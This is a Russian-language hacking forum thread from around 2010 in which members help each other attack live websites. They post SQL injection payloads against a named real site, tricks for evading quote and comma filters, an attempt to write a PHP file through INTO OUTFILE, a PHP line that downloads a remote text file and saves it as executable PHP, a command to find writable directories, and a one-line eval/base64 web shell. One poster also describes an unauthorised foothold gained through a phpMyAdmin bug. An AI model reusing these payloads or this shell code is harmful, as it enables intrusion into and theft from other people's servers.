Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    пробовал 1+or+1=(/*!SELECT*/+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--

    PHP:
    Microsoft OLE DB Provider for SQL Server error '80040e14'     
    Incorrect syntax near the keyword 'TOP'.    
    /
    adredirect.aspline 23
    :(
     
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    YuNi|[c


    а без top ?
     
    _________________________
  3. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    собсно вот сам ресурс:

    PHP:
    http://www.stockhouse.com/adredirect.asp?sid=7385+or+1=(SELselectECT+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
    на без топ ругается на table_name :(
     
  4. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    Как в sipt Cookies добавить?добовляю в additional headers
    Cookie : PHPSESSID=3d896ce0ca05137e1ffa4f58893706e8
    и вроде не работает так
     
  5. CTAPu4OK

    CTAPu4OK Banned

    Joined:
    28 Oct 2008
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Проблема с заливкой, сколько пытаюсь нечего не помогает, в интернете статей по поводу этого нету, везде одно и тоже.. или outfile или dumpfile а если фильтруются ковычки что делать не кто не говорит =(
    Читать файлы могу с помощью LOAD_FILE но
    -587955+union+select+1,2,3,4,0x6869,6,7,8,9,10,11+into+outfile+'/home/data/www/2323.php'+from+mysql.user--
    не пашет, так как фильтрует кавычки, дамп файл тоже не пашет, кодировки в чар, хекс и тд и тп тоже не помагают, второй подзапрос с обходом магик_куотс не прокатывает =( что еще можно применить ? (мозг и руки уже имеются)
     
  6. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    file_priv что говорит?
     
    _________________________
  7. CTAPu4OK

    CTAPu4OK Banned

    Joined:
    28 Oct 2008
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Читать файлы могу с помощью LOAD_FILE, FILE_PRIV есть.


    Ошибки сервера выложить не могу, так как их нету (в смысле на экране))
     
  8. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    обычным смертным это не дано=((( в привате наверно есть какие-нибудь методы....
     
  9. CTAPu4OK

    CTAPu4OK Banned

    Joined:
    28 Oct 2008
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Надеюсь найдутся добрые люди которые хотя бы шипнут про способ)

    пы.сы. И если есть пхп программеры, может у кого найдется скрипт который при выполнении скачает txt файл с внешки и переименует его в php (Это не для скули)
     
  10. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    PHP:
    copy('http://2.ru/1.txt''1.php');
     
  11. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    А ты на 100% уверен что у тебя путь до дериктории правельный??
    Если нет ошибок на страничке, тогда как ты узнал путь?
    и ести у тебя есть доступ к mysql, то ищи phpmyadmin, или пробуй на удаленный доступ!
     
  12. CTAPu4OK

    CTAPu4OK Banned

    Joined:
    28 Oct 2008
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    На 100% уверен что путь правельный, доступ к серверу так же имею с помощью бага phpmyadmin

    PHP:
    $output = `ls -la /home/data/www`; 
    print 
    "<pre>$output</pre>";
    exit;
    Но увы я под юзверем apache и создавать, именять, архивировать, редактировать, удалять и тд и тп не имею права, вообщем ограничен до хрен знает чего.
    Щя еще попробую скачать с внешки с помощью скрипта.

    Полного доступа к mysql у меня нету, только скуля, логин и пароль админа среди 900к+ юзверев искать (если учесть что там все ид номера в разброс и все не попорядку, так еще и через лимит, так как group_concat выводит не все) просто бред, а автоматизированного способа я не знаю =(

    + ко всему этому все конфигурационные файлы 667, т.е. читать с помощью скули или команды cat я не могу.

    Я очень давно всем этим не занимался, вот пришлось вспомнить
     
  13. Sams

    Sams Member

    Joined:
    18 Apr 2009
    Messages:
    247
    Likes Received:
    70
    Reputations:
    17
    Ребята, помогите, очень нужна помощь.
    Как в SQL-injection можно заменить запятую (именно запятую, не кавычку)? Вижу вариант только с char(44), но не знаю как правильно запрос составить. Вот пример:

    index.php?id=-999+union+select+1+char(44)+2+char(44)+3+--+

    или как-то через скобки?

    Уже столько вариантов перепробовал, и не знаю что делать.
     
  14. DrakonHaSh

    DrakonHaSh Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    118
    Likes Received:
    29
    Reputations:
    24
    CTAPu4OK
    поиск доступных файлов/папок для записи:
    find /home/data/www -perm -2 -ls

    доступ к /tmp/bla.php есть практически всегда

    если у тебя есть возможность выполнять php код на сервере то с кавычками можно бороться так:
    <?eval(base64_decode($_GET[shell]));?>
     
  15. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40

    попробуй:
    index.php?id=-999+union+select+1%2С2%2С3--
     
  16. Sams

    Sams Member

    Joined:
    18 Apr 2009
    Messages:
    247
    Likes Received:
    70
    Reputations:
    17
    Через %2С не прокатило :mad:
     
  17. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Ты потом этот скрипт от туда никак не воспроизведешь!!
     
  18. crystalbit

    crystalbit Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    212
    Likes Received:
    88
    Reputations:
    8
    0x2c

    upd, ступил, думал тебе в переменную надо)
     
    #13098 crystalbit, 22 May 2010
    Last edited: 22 May 2010
  19. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    тогда так:
    index.php?id=-999+union+select+1/*!,*/2/*!,*/3--

    можно и так
    если версия mysql 5
    index.php?id=-999+union+select+1/*!12345,*/2/*!12345,*/3--

    4 версия
    index.php?id=-999+union+select+1/*!1234,*/2/*!1234,*/3--

    etc...
     
    #13099 pinch, 22 May 2010
    Last edited: 22 May 2010
    1 person likes this.
  20. CTAPu4OK

    CTAPu4OK Banned

    Joined:
    28 Oct 2008
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Папки все доступны для записи, но права ограничены что даже скопировать не могу =(
    php коды могу выполнять, но тоже ограниченные и после каждого кода идет exit; т.е. использовать код можно только один раз и в дальнейшем его нельзя использовать)

    т.е. Сам експлойт на одном сервере, txt файл с исполняющимися коммандами на другом сервере, а пхп май админ на другом)
     
    #13100 CTAPu4OK, 22 May 2010
    Last edited: 22 May 2010
Loading...
Thread Status:
Not open for further replies.